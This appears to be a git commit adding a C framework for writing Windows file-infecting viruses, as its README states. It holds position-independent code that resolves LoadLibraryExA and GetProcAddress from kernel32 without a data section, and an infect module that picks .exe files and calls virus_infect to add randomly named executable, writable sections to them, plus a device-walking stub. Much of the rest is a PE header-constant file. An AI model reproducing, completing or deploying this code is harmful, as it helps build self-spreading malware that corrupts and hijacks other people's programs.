initial commit. I dind't work on this project for a while now but as far as I remember everything works pretty good ;)
This commit is contained in:
commit
fb5f2465a1
|
@ -0,0 +1,8 @@
|
|||
This is my virus writing framework. Everythin is position independent (that's why strings are so stangely formated ;) ) you can load it everywhere
|
||||
in memory and still call stdlib or winapi functions. You can also find funcitons for adding PE sections and so on...
|
||||
|
||||
To compile it use the following order of source files:
|
||||
gcc aaa.c main.c rest zzz.c
|
||||
|
||||
|
||||
Happy VXing
|
|
@ -0,0 +1,16 @@
|
|||
#include "aaa.h"
|
||||
|
||||
void *start() {
|
||||
void *start;
|
||||
|
||||
__asm__("call nextIns;\r\n"
|
||||
"nextIns:\r\n"
|
||||
"pop %0\r\n"
|
||||
: "=r" (start)
|
||||
:
|
||||
:);
|
||||
start = start - 0x0b;
|
||||
|
||||
return start;
|
||||
}
|
||||
|
|
@ -0,0 +1,120 @@
|
|||
#include "export.h"
|
||||
|
||||
IMAGE_EXPORT_DIRECTORY *get_loaded_export_hdr(void *image)
|
||||
{
|
||||
IMAGE_DOS_HEADER *dos;
|
||||
IMAGE_NT_HEADERS32 *nt32;
|
||||
IMAGE_NT_HEADERS64 *nt64;
|
||||
IMAGE_FILE_HEADER *file;
|
||||
IMAGE_OPTIONAL_HEADER32 *opt32;
|
||||
IMAGE_OPTIONAL_HEADER64 *opt64;
|
||||
|
||||
dos = (IMAGE_DOS_HEADER *)image;
|
||||
if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;
|
||||
nt32 = (IMAGE_NT_HEADERS32*)&((char*)image)[dos->e_lfanew];
|
||||
if (nt32->Signature != IMAGE_NT_SIGNATURE) return NULL;
|
||||
|
||||
file = &nt32->FileHeader;
|
||||
if (IMAGE_FILE_MACHINE_I386 == file->Machine)
|
||||
{
|
||||
opt32 = &nt32->OptionalHeader;
|
||||
return (IMAGE_EXPORT_DIRECTORY *)&((char *)image)
|
||||
[opt32->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
|
||||
.VirtualAddress];
|
||||
}
|
||||
else if (IMAGE_FILE_MACHINE_AMD64 == file->Machine)
|
||||
{
|
||||
nt64 = (IMAGE_NT_HEADERS64*)nt32;
|
||||
opt64 = &nt64->OptionalHeader;
|
||||
return (IMAGE_EXPORT_DIRECTORY *)&((char *)image)
|
||||
[opt64->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
|
||||
.VirtualAddress];
|
||||
}
|
||||
else return NULL;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void *get_loaded_export_function_by_name(void *image, char *name)
|
||||
{
|
||||
IMAGE_EXPORT_DIRECTORY *export;
|
||||
uint32_t *eft, *ent; //functions, names
|
||||
uint16_t *eot; //offsets
|
||||
|
||||
export = get_loaded_export_hdr(image);
|
||||
if (NULL == export) return NULL;
|
||||
eft = (uint32_t *)&((char *)image)[export->AddressOfFunctions];
|
||||
ent = (uint32_t *)&((char *)image)[export->AddressOfNames];
|
||||
eot = (uint16_t *)&((char *)image)[export->AddressOfNameOrdinals];
|
||||
|
||||
for (int i = 0; i < export->NumberOfNames; i++)
|
||||
{
|
||||
if (0 == pic_strncmp((char *)&((char *)image)[ent[i]],
|
||||
name, pic_strlen(name)))
|
||||
return (char *)&((char*)image)[eft[eot[i]]];
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
/*kernelMZ is a pointer on the mz signature of the kernel32.dll
|
||||
*which is loaded somewhere in the calling processes address space */
|
||||
__attribute__((sysv_abi) )void *get_function_from_lib_by_kernelMZ(void *kernelMZ, char *libName,
|
||||
char *funcName)
|
||||
{
|
||||
char loadLibraryName[15];
|
||||
char getProcAddrName[15];
|
||||
void *dll;
|
||||
llib loadLibrary;
|
||||
gpa getProcAddr;
|
||||
|
||||
//i know it looks ugly but we have to endure it
|
||||
//sine we mustn't have the string in a seperate .data section
|
||||
loadLibraryName[0] = 'L';
|
||||
loadLibraryName[1] = 'o';
|
||||
loadLibraryName[2] = 'a';
|
||||
loadLibraryName[3] = 'd';
|
||||
loadLibraryName[4] = 'L';
|
||||
loadLibraryName[5] = 'i';
|
||||
loadLibraryName[6] = 'b';
|
||||
loadLibraryName[7] = 'r';
|
||||
loadLibraryName[8] = 'a';
|
||||
loadLibraryName[9] = 'r';
|
||||
loadLibraryName[10] = 'y';
|
||||
loadLibraryName[11] = 'E';
|
||||
loadLibraryName[12] = 'x';
|
||||
loadLibraryName[13] = 'A';
|
||||
loadLibraryName[14] = '\x00';
|
||||
|
||||
getProcAddrName[0] = 'G';
|
||||
getProcAddrName[1] = 'e';
|
||||
getProcAddrName[2] = 't';
|
||||
getProcAddrName[3] = 'P';
|
||||
getProcAddrName[4] = 'r';
|
||||
getProcAddrName[5] = 'o';
|
||||
getProcAddrName[6] = 'c';
|
||||
getProcAddrName[7] = 'A';
|
||||
getProcAddrName[8] = 'd';
|
||||
getProcAddrName[9] = 'd';
|
||||
getProcAddrName[10] = 'r';
|
||||
getProcAddrName[11] = 'e';
|
||||
getProcAddrName[12] = 's';
|
||||
getProcAddrName[13] = 's';
|
||||
getProcAddrName[14] = '\x00';
|
||||
|
||||
loadLibrary = get_loaded_export_function_by_name(kernelMZ,
|
||||
loadLibraryName);
|
||||
getProcAddr = get_loaded_export_function_by_name(kernelMZ,
|
||||
getProcAddrName);
|
||||
if (NULL == loadLibrary) return NULL;
|
||||
if (NULL == libName) {
|
||||
dll = kernelMZ;
|
||||
}
|
||||
else {
|
||||
dll = loadLibrary(libName, 0, 0);
|
||||
}
|
||||
if (NULL == dll) return NULL;
|
||||
if (NULL == getProcAddr) return NULL;
|
||||
return getProcAddr(dll, funcName);
|
||||
}
|
||||
|
|
@ -0,0 +1,21 @@
|
|||
#ifndef EXPORT
|
||||
#define EXPORT
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stdio.h>
|
||||
#include "stdfuncs.h"
|
||||
#include "pe.h"
|
||||
//#include <winsock.h>
|
||||
#if defined(__amd64__)
|
||||
typedef void *(*llib)(char *asciiName, uint64_t x, uint64_t y)__attribute__((ms_abi));
|
||||
typedef void *(*gpa)(void *dll, char *procName)__attribute__((ms_abi));
|
||||
#else
|
||||
typedef void *(*llib)(char *asciiName, uint64_t x, uint64_t y)__attribute__((stdcall));
|
||||
typedef void *(*gpa)(void *dll, char *procName)__attribute__((stdcall));
|
||||
#endif
|
||||
|
||||
IMAGE_EXPORT_DIRECTORY *get_loaded_export_hdr(void *image);
|
||||
void *get_loaded_export_function_by_name(void *image, char *name);
|
||||
void *get_function_from_lib_by_kernelMZ(void *kernelMZ, char *libName,
|
||||
char *funcName)__attribute__((sysv_abi));
|
||||
#endif
|
|
@ -0,0 +1,101 @@
|
|||
#include "infect.h"
|
||||
//#include <stdio.h>
|
||||
|
||||
void *check_if_section_in_file(sec_info *file, sec_info *section);
|
||||
void *check_if_file_in_file_list(sec_info *fileList, sec_info *file);
|
||||
static void add_to_ret_list(sec_info *retBase, sec_info *newFbase);
|
||||
static void merge_sec_lists(sec_info *retFbase, sec_info *addFbase);
|
||||
sec_info *infect_build_sec_name_struct(pids *pids);
|
||||
|
||||
//void print_list(sec_info *list);
|
||||
|
||||
sec_info *si = NULL;
|
||||
|
||||
char *infect_gen_sec_name() {
|
||||
char *charBytes, *oldSName;
|
||||
int rand;
|
||||
|
||||
__asm__("call post;\r\n"
|
||||
".string \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.1234567890\";\r\n"
|
||||
".string \"CCCCCCCC\";\r\n"
|
||||
"post:\r\n"
|
||||
"pop %0;\r\n"
|
||||
:"=r"(charBytes)
|
||||
:
|
||||
:);
|
||||
// oldSName = charBytes + 63;
|
||||
oldSName = pic_malloc(8);
|
||||
rand = pic_gen_random(10);
|
||||
if (rand < 5) return oldSName;
|
||||
for (int i = 0; i < 8; i++) {
|
||||
if (0 != i
|
||||
&& oldSName[i-1] == 0) {
|
||||
oldSName[i] = '\x00';
|
||||
}
|
||||
rand = pic_gen_random(64);
|
||||
oldSName[i] = charBytes[rand];
|
||||
}
|
||||
return oldSName;
|
||||
}
|
||||
|
||||
void *infect_callback_ptr() {
|
||||
void *idp;
|
||||
|
||||
__asm__("call nIns;\r\n"
|
||||
"nIns:\r\n"
|
||||
"pop %0;\r\n"
|
||||
:"=r" (idp)
|
||||
:
|
||||
:);
|
||||
#define ID_OFFSET 12
|
||||
return (idp+ID_OFFSET);
|
||||
}
|
||||
|
||||
//returns number of infected files
|
||||
int infect_callback(char *path, int pathLen, dir_list *fileAttr) {
|
||||
char *exeString;
|
||||
void *testFd;
|
||||
char *secName;
|
||||
__asm__("call afterString;\r\n"
|
||||
".string \".exe\";\r\n"
|
||||
".string \".new00\";\r\n"
|
||||
"afterString:\r\n"
|
||||
"pop %0;\r\n"
|
||||
:"=r"(exeString)
|
||||
:
|
||||
:);
|
||||
secName = infect_gen_sec_name();
|
||||
if (!pic_strcmp(&path[pathLen-4], exeString)) return 0;
|
||||
if (-1 == virus_infect(path, secName, (IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE))) return 0;
|
||||
return 1;
|
||||
}
|
||||
|
||||
void *infect_devices_ptr() {
|
||||
void *idp;
|
||||
|
||||
__asm__("call nIns2;\r\n"
|
||||
"nIns2:\r\n"
|
||||
"pop %0\r\n"
|
||||
:"=r" (idp)
|
||||
:
|
||||
:);
|
||||
#define ID_OFFSET 12
|
||||
return (idp+ID_OFFSET);
|
||||
}
|
||||
|
||||
int infect_devices() {
|
||||
dir_list *dev, *devCur;
|
||||
void *icb;
|
||||
|
||||
icb = infect_callback_ptr();
|
||||
|
||||
dev = pic_get_devices();
|
||||
devCur = dev;
|
||||
while (devCur->next) {
|
||||
// pic_get_paths_callback(devCur->fName, icb);
|
||||
message_box( devCur->fName);
|
||||
devCur = devCur->next;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
|
@ -0,0 +1,20 @@
|
|||
#include "virus.h"
|
||||
#include "stdfuncs.h"
|
||||
#include "pic-peter/sections.h"
|
||||
#include "pe.h"
|
||||
|
||||
typedef struct __SEC_INFO {
|
||||
char name[8];
|
||||
uint32_t flags;
|
||||
void *next;
|
||||
} sec_info;
|
||||
|
||||
|
||||
int infect_running_procs();
|
||||
int infect_devices();
|
||||
|
||||
void *infect_running_procs_ptr();
|
||||
void *infect_devices_ptr();
|
||||
|
||||
int infect_callback(char *path, int pathLen, dir_list *fileAttr);
|
||||
char *infect_gen_sec_name();
|
|
@ -0,0 +1,11 @@
|
|||
#include "infect.h"
|
||||
#include "stdfuncs.h"
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
int main(void)
|
||||
{
|
||||
infect_devices();
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,26 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
int main(void) {
|
||||
FILE *fd;
|
||||
char *buf, *secName;
|
||||
int bufSz;
|
||||
|
||||
fd = fopen("a.exe", "rb");
|
||||
fseek(fd, 0, SEEK_END);
|
||||
bufSz = ftell(fd);
|
||||
fseek(fd, 0, SEEK_SET);
|
||||
|
||||
buf = malloc(bufSz);
|
||||
fread(buf, 1, bufSz, fd);
|
||||
fclose(fd);
|
||||
|
||||
int i = 0;
|
||||
while (secName = sections_by_index_get_name(buf, i)) {
|
||||
sections_by_name_set_writable(buf, secName);
|
||||
}
|
||||
fd = fopen("a.exe", "w+b");
|
||||
fwrite(buf, 1, bufSz, fd);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,562 @@
|
|||
#ifndef PE_H
|
||||
#define PE_H
|
||||
#include <stdint.h>
|
||||
|
||||
#define IMAGE_DOS_SIGNATURE 0x5A4D // MZ
|
||||
#define IMAGE_NT_SIGNATURE 0x00004550 // PE00
|
||||
#define IMAGE_SIZEOF_FILE_HEADER 20
|
||||
#define IMAGE_FILE_EXECUTABLE_IMAGE 0x0002 // File is executable (i.e. no unresolved externel references).
|
||||
#define IMAGE_FILE_LINE_NUMS_STRIPPED 0x0004 // Line nunbers stripped from file.
|
||||
#define IMAGE_FILE_LOCAL_SYMS_STRIPPED 0x0008 // Local symbols stripped from file.
|
||||
#define IMAGE_FILE_AGGRESIVE_WS_TRIM 0x0010 // Agressively trim working set
|
||||
#define IMAGE_FILE_LARGE_ADDRESS_AWARE 0x0020 // App can handle >2gb addresses
|
||||
#define IMAGE_FILE_BYTES_REVERSED_LO 0x0080 // Bytes of machine word are reversed.
|
||||
#define IMAGE_FILE_32BIT_MACHINE 0x0100 // 32 bit word machine.
|
||||
#define IMAGE_FILE_DEBUG_STRIPPED 0x0200 // Debugging info stripped from file in .DBG file
|
||||
#define IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP 0x0400 // If Image is on removable media, copy and run from the swap file.
|
||||
#define IMAGE_FILE_NET_RUN_FROM_SWAP 0x0800 // If Image is on Net, copy and run from the swap file.
|
||||
#define IMAGE_FILE_SYSTEM 0x1000 // System File.
|
||||
#define IMAGE_FILE_DLL 0x2000 // File is a DLL.
|
||||
#define IMAGE_FILE_UP_SYSTEM_ONLY 0x4000 // File should only be run on a UP machine
|
||||
#define IMAGE_FILE_BYTES_REVERSED_HI 0x8000 // Bytes of machine word are reversed.
|
||||
#define IMAGE_FILE_MACHINE_UNKNOWN 0
|
||||
#define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
|
||||
#define IMAGE_FILE_MACHINE_R3000 0x0162 // MIPS little-endian, 0x160 big-endian
|
||||
#define IMAGE_FILE_MACHINE_R4000 0x0166 // MIPS little-endian
|
||||
#define IMAGE_FILE_MACHINE_WCEMIPSV2 0x0169 // MIPS little-endian WCE v2
|
||||
#define IMAGE_FILE_MACHINE_ALPHA 0x0184 // Alpha_AXP
|
||||
#define IMAGE_FILE_MACHINE_SH3 0x01a2 // SH3 little-endian
|
||||
#define IMAGE_FILE_MACHINE_SH3DSP 0x01a3
|
||||
#define IMAGE_FILE_MACHINE_SH3E 0x01a4 // SH3E little-endian
|
||||
#define IMAGE_FILE_MACHINE_SH4 0x01a6 // SH4 little-endian
|
||||
#define IMAGE_FILE_MACHINE_SH5 0x01a8 // SH5
|
||||
#define IMAGE_FILE_MACHINE_ARM 0x01c0 // ARM Little-Endian
|
||||
#define IMAGE_FILE_MACHINE_THUMB 0x01c2
|
||||
#define IMAGE_FILE_MACHINE_AM33 0x01d3
|
||||
#define IMAGE_FILE_MACHINE_POWERPC 0x01F0 // IBM PowerPC Little-Endian
|
||||
#define IMAGE_FILE_MACHINE_POWERPCFP 0x01f1
|
||||
#define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64
|
||||
#define IMAGE_FILE_MACHINE_MIPS16 0x0266 // MIPS
|
||||
#define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64
|
||||
#define IMAGE_FILE_MACHINE_MIPSFPU 0x0366 // MIPS
|
||||
#define IMAGE_FILE_MACHINE_MIPSFPU16 0x0466 // MIPS
|
||||
#define IMAGE_FILE_MACHINE_AXP64 IMAGE_FILE_MACHINE_ALPHA64
|
||||
#define IMAGE_FILE_MACHINE_TRICORE 0x0520 // Infineon
|
||||
#define IMAGE_FILE_MACHINE_CEF 0x0CEF
|
||||
#define IMAGE_FILE_MACHINE_EBC 0x0EBC // EFI Byte Code
|
||||
#define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8)
|
||||
#define IMAGE_FILE_MACHINE_M32R 0x9041 // M32R little-endian
|
||||
#define IMAGE_FILE_MACHINE_CEE 0xC0EE
|
||||
#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
|
||||
#define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b
|
||||
#define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b
|
||||
#define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107
|
||||
#define IMAGE_SUBSYSTEM_UNKNOWN 0 // Unknown subsystem.
|
||||
#define IMAGE_SUBSYSTEM_NATIVE 1 // Image doesn't require a subsystem.
|
||||
#define IMAGE_SUBSYSTEM_WINDOWS_GUI 2 // Image runs in the Windows GUI subsystem.
|
||||
#define IMAGE_SUBSYSTEM_WINDOWS_CUI 3 // Image runs in the Windows character subsystem.
|
||||
#define IMAGE_SUBSYSTEM_OS2_CUI 5 // image runs in the OS/2 character subsystem.
|
||||
#define IMAGE_SUBSYSTEM_POSIX_CUI 7 // image runs in the Posix character subsystem.
|
||||
#define IMAGE_SUBSYSTEM_NATIVE_WINDOWS 8 // image is a native Win9x driver.
|
||||
#define IMAGE_SUBSYSTEM_WINDOWS_CE_GUI 9 // Image runs in the Windows CE subsystem.
|
||||
#define IMAGE_SUBSYSTEM_EFI_APPLICATION 10 //
|
||||
#define IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER 11 //
|
||||
#define IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER 12 //
|
||||
#define IMAGE_SUBSYSTEM_EFI_ROM 13
|
||||
#define IMAGE_SUBSYSTEM_XBOX 14
|
||||
#define IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16
|
||||
#define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040 // DLL can move.
|
||||
#define IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY 0x0080 // Code Integrity Image
|
||||
#define IMAGE_DLLCHARACTERISTICS_NX_COMPAT 0x0100 // Image is NX compatible
|
||||
#define IMAGE_DLLCHARACTERISTICS_NO_ISOLATION 0x0200 // Image understands isolation and doesn't want it
|
||||
#define IMAGE_DLLCHARACTERISTICS_NO_SEH 0x0400 // Image does not use SEH. No SE handler may reside in this image
|
||||
#define IMAGE_DLLCHARACTERISTICS_NO_BIND 0x0800 // Do not bind this image.
|
||||
#define IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE 0x8000
|
||||
#define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_RESOURCE 2 // Resource Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_EXCEPTION 3 // Exception Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_SECURITY 4 // Security Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_BASERELOC 5 // Base Relocation Table
|
||||
#define IMAGE_DIRECTORY_ENTRY_DEBUG 6 // Debug Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE 7 // Architecture Specific Data
|
||||
#define IMAGE_DIRECTORY_ENTRY_GLOBALPTR 8 // RVA of GP
|
||||
#define IMAGE_DIRECTORY_ENTRY_TLS 9 // TLS Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 10 // Load Configuration Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 11 // Bound Import Directory in headers
|
||||
#define IMAGE_DIRECTORY_ENTRY_IAT 12 // Import Address Table
|
||||
#define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 13 // Delay Load Import Descriptors
|
||||
#define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14 // COM Runtime descriptor
|
||||
#define IMAGE_SIZEOF_SHORT_NAME 8
|
||||
#define IMAGE_SIZEOF_SECTION_HEADER 40
|
||||
#define IMAGE_SCN_TYPE_NO_PAD 0x00000008 // Reserved.
|
||||
#define IMAGE_SCN_CNT_CODE 0x00000020 // Section contains code.
|
||||
#define IMAGE_SCN_CNT_INITIALIZED_DATA 0x00000040 // Section contains initialized data.
|
||||
#define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 // Section contains uninitialized data.
|
||||
#define IMAGE_SCN_LNK_OTHER 0x00000100 // Reserved.
|
||||
#define IMAGE_SCN_LNK_INFO 0x00000200 // Section contains comments or some other type of information.
|
||||
#define IMAGE_SCN_LNK_REMOVE 0x00000800 // Section contents will not become part of image.
|
||||
#define IMAGE_SCN_LNK_COMDAT 0x00001000 // Section contents comdat.
|
||||
#define IMAGE_SCN_NO_DEFER_SPEC_EXC 0x00004000 // Reset speculative exceptions handling bits in the TLB entries for this section.
|
||||
#define IMAGE_SCN_GPREL 0x00008000 // Section content can be accessed relative to GP
|
||||
#define IMAGE_SCN_MEM_FARDATA 0x00008000
|
||||
#define IMAGE_SCN_MEM_PURGEABLE 0x00020000
|
||||
#define IMAGE_SCN_MEM_16BIT 0x00020000
|
||||
#define IMAGE_SCN_MEM_LOCKED 0x00040000
|
||||
#define IMAGE_SCN_MEM_PRELOAD 0x00080000
|
||||
#define IMAGE_SCN_ALIGN_1BYTES 0x00100000 //
|
||||
#define IMAGE_SCN_ALIGN_2BYTES 0x00200000 //
|
||||
#define IMAGE_SCN_ALIGN_4BYTES 0x00300000 //
|
||||
#define IMAGE_SCN_ALIGN_8BYTES 0x00400000 //
|
||||
#define IMAGE_SCN_ALIGN_16BYTES 0x00500000 // Default alignment if no others are specified.
|
||||
#define IMAGE_SCN_ALIGN_32BYTES 0x00600000 //
|
||||
#define IMAGE_SCN_ALIGN_64BYTES 0x00700000 //
|
||||
#define IMAGE_SCN_ALIGN_128BYTES 0x00800000 //
|
||||
#define IMAGE_SCN_ALIGN_256BYTES 0x00900000 //
|
||||
#define IMAGE_SCN_ALIGN_512BYTES 0x00A00000 //
|
||||
#define IMAGE_SCN_ALIGN_1024BYTES 0x00B00000 //
|
||||
#define IMAGE_SCN_ALIGN_2048BYTES 0x00C00000 //
|
||||
#define IMAGE_SCN_ALIGN_4096BYTES 0x00D00000 //
|
||||
#define IMAGE_SCN_ALIGN_8192BYTES 0x00E00000 //
|
||||
#define IMAGE_SCN_ALIGN_MASK 0x00F00000
|
||||
#define IMAGE_SCN_LNK_NRELOC_OVFL 0x01000000 // Section contains extended relocations.
|
||||
#define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 // Section can be discarded.
|
||||
#define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 // Section is not cachable.
|
||||
#define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 // Section is not pageable.
|
||||
#define IMAGE_SCN_MEM_SHARED 0x10000000 // Section is shareable.
|
||||
#define IMAGE_SCN_MEM_EXECUTE 0x20000000 // Section is executable.
|
||||
#define IMAGE_SCN_MEM_READ 0x40000000 // Section is readable.
|
||||
#define IMAGE_SCN_MEM_WRITE 0x80000000 // Section is writeable.
|
||||
#define IMAGE_SCN_SCALE_INDEX 0x00000001 // Tls index is scaled
|
||||
#define IMAGE_SIZEOF_SYMBOL 18
|
||||
#define IMAGE_SYM_TYPE_NULL 0x0000 // no type.
|
||||
#define IMAGE_SYM_TYPE_VOID 0x0001 //
|
||||
#define IMAGE_SYM_TYPE_CHAR 0x0002 // type character.
|
||||
#define IMAGE_SYM_TYPE_SHORT 0x0003 // type short integer.
|
||||
#define IMAGE_SYM_TYPE_INT 0x0004 //
|
||||
#define IMAGE_SYM_TYPE_LONG 0x0005 //
|
||||
#define IMAGE_SYM_TYPE_FLOAT 0x0006 //
|
||||
#define IMAGE_SYM_TYPE_DOUBLE 0x0007 //
|
||||
#define IMAGE_SYM_TYPE_STRUCT 0x0008 //
|
||||
#define IMAGE_SYM_TYPE_UNION 0x0009 //
|
||||
#define IMAGE_SYM_TYPE_ENUM 0x000A // enumeration.
|
||||
#define IMAGE_SYM_TYPE_MOE 0x000B // member of enumeration.
|
||||
#define IMAGE_SYM_TYPE_BYTE 0x000C //
|
||||
#define IMAGE_SYM_TYPE_WORD 0x000D //
|
||||
#define IMAGE_SYM_TYPE_UINT 0x000E //
|
||||
#define IMAGE_SYM_TYPE_DWORD 0x000F //
|
||||
#define IMAGE_SYM_TYPE_PCODE 0x8000 //
|
||||
#define IMAGE_SYM_DTYPE_NULL 0 // no derived type.
|
||||
#define IMAGE_SYM_DTYPE_POINTER 1 // pointer.
|
||||
#define IMAGE_SYM_DTYPE_FUNCTION 2 // function.
|
||||
#define IMAGE_SYM_DTYPE_ARRAY 3 // array.
|
||||
#define IMAGE_SYM_CLASS_NULL 0x0000
|
||||
#define IMAGE_SYM_CLASS_AUTOMATIC 0x0001
|
||||
#define IMAGE_SYM_CLASS_EXTERNAL 0x0002
|
||||
#define IMAGE_SYM_CLASS_STATIC 0x0003
|
||||
#define IMAGE_SYM_CLASS_REGISTER 0x0004
|
||||
#define IMAGE_SYM_CLASS_EXTERNAL_DEF 0x0005
|
||||
#define IMAGE_SYM_CLASS_LABEL 0x0006
|
||||
#define IMAGE_SYM_CLASS_UNDEFINED_LABEL 0x0007
|
||||
#define IMAGE_SYM_CLASS_MEMBER_OF_STRUCT 0x0008
|
||||
#define IMAGE_SYM_CLASS_ARGUMENT 0x0009
|
||||
#define IMAGE_SYM_CLASS_STRUCT_TAG 0x000A
|
||||
#define IMAGE_SYM_CLASS_MEMBER_OF_UNION 0x000B
|
||||
#define IMAGE_SYM_CLASS_UNION_TAG 0x000C
|
||||
#define IMAGE_SYM_CLASS_TYPE_DEFINITION 0x000D
|
||||
#define IMAGE_SYM_CLASS_UNDEFINED_STATIC 0x000E
|
||||
#define IMAGE_SYM_CLASS_ENUM_TAG 0x000F
|
||||
#define IMAGE_SYM_CLASS_MEMBER_OF_ENUM 0x0010
|
||||
#define IMAGE_SYM_CLASS_REGISTER_PARAM 0x0011
|
||||
#define IMAGE_SYM_CLASS_BIT_FIELD 0x0012
|
||||
#define IMAGE_SYM_CLASS_FAR_EXTERNAL 0x0044 //
|
||||
#define IMAGE_SYM_CLASS_BLOCK 0x0064
|
||||
#define IMAGE_SYM_CLASS_FUNCTION 0x0065
|
||||
#define IMAGE_SYM_CLASS_END_OF_STRUCT 0x0066
|
||||
#define IMAGE_SYM_CLASS_FILE 0x0067
|
||||
#define IMAGE_SYM_CLASS_SECTION 0x0068
|
||||
#define IMAGE_SYM_CLASS_WEAK_EXTERNAL 0x0069
|
||||
#define IMAGE_SYM_CLASS_CLR_TOKEN 0x006B
|
||||
#define IMAGE_REL_I386_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
|
||||
#define IMAGE_REL_I386_DIR16 0x0001 // Direct 16-bit reference to the symbols virtual address
|
||||
#define IMAGE_REL_I386_REL16 0x0002 // PC-relative 16-bit reference to the symbols virtual address
|
||||
#define IMAGE_REL_I386_DIR32 0x0006 // Direct 32-bit reference to the symbols virtual address
|
||||
#define IMAGE_REL_I386_DIR32NB 0x0007 // Direct 32-bit reference to the symbols virtual address, base not included
|
||||
#define IMAGE_REL_I386_SEG12 0x0009 // Direct 16-bit reference to the segment-selector bits of a 32-bit virtual address
|
||||
#define IMAGE_REL_I386_SECTION 0x000A
|
||||
#define IMAGE_REL_I386_SECREL 0x000B
|
||||
#define IMAGE_REL_I386_TOKEN 0x000C // clr token
|
||||
#define IMAGE_REL_I386_SECREL7 0x000D // 7 bit offset from base of section containing target
|
||||
#define IMAGE_REL_I386_REL32 0x0014 // PC-relative 32-bit reference to the symbols virtual address
|
||||
#define IMAGE_REL_MIPS_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
|
||||
#define IMAGE_REL_MIPS_REFHALF 0x0001
|
||||
#define IMAGE_REL_MIPS_REFWORD 0x0002
|
||||
#define IMAGE_REL_MIPS_JMPADDR 0x0003
|
||||
#define IMAGE_REL_MIPS_REFHI 0x0004
|
||||
#define IMAGE_REL_MIPS_REFLO 0x0005
|
||||
#define IMAGE_REL_MIPS_GPREL 0x0006
|
||||
#define IMAGE_REL_MIPS_LITERAL 0x0007
|
||||
#define IMAGE_REL_MIPS_SECTION 0x000A
|
||||
#define IMAGE_REL_MIPS_SECREL 0x000B
|
||||
#define IMAGE_REL_MIPS_SECRELLO 0x000C // Low 16-bit section relative referemce (used for >32k TLS)
|
||||
#define IMAGE_REL_MIPS_SECRELHI 0x000D // High 16-bit section relative reference (used for >32k TLS)
|
||||
#define IMAGE_REL_MIPS_TOKEN 0x000E // clr token
|
||||
#define IMAGE_REL_MIPS_JMPADDR16 0x0010
|
||||
#define IMAGE_REL_MIPS_REFWORDNB 0x0022
|
||||
#define IMAGE_REL_MIPS_PAIR 0x0025
|
||||
#define IMAGE_REL_ALPHA_ABSOLUTE 0x0000
|
||||
#define IMAGE_REL_ALPHA_REFLONG 0x0001
|
||||
#define IMAGE_REL_ALPHA_REFQUAD 0x0002
|
||||
#define IMAGE_REL_ALPHA_GPREL32 0x0003
|
||||
#define IMAGE_REL_ALPHA_LITUSE 0x0005
|
||||
#define IMAGE_REL_ALPHA_GPDISP 0x0006
|
||||
#define IMAGE_REL_ALPHA_BRADDR 0x0007
|
||||
#define IMAGE_REL_ALPHA_HINT 0x0008
|
||||
#define IMAGE_REL_ALPHA_INLINE_REFLONG 0x0009
|
||||
#define IMAGE_REL_ALPHA_REFHI 0x000A
|
||||
#define IMAGE_REL_ALPHA_REFLO 0x000B
|
||||
#define IMAGE_REL_ALPHA_PAIR 0x000C
|
||||
#define IMAGE_REL_ALPHA_MATCH 0x000D
|
||||
#define IMAGE_REL_ALPHA_SECTION 0x000E
|
||||
#define IMAGE_REL_ALPHA_SECREL 0x000F
|
||||
#define IMAGE_REL_ALPHA_REFLONGNB 0x0010
|
||||
#define IMAGE_REL_ALPHA_SECRELLO 0x0011 // Low 16-bit section relative reference
|
||||
#define IMAGE_REL_ALPHA_SECRELHI 0x0012 // High 16-bit section relative reference
|
||||
#define IMAGE_REL_ALPHA_REFQ3 0x0013 // High 16 bits of 48 bit reference
|
||||
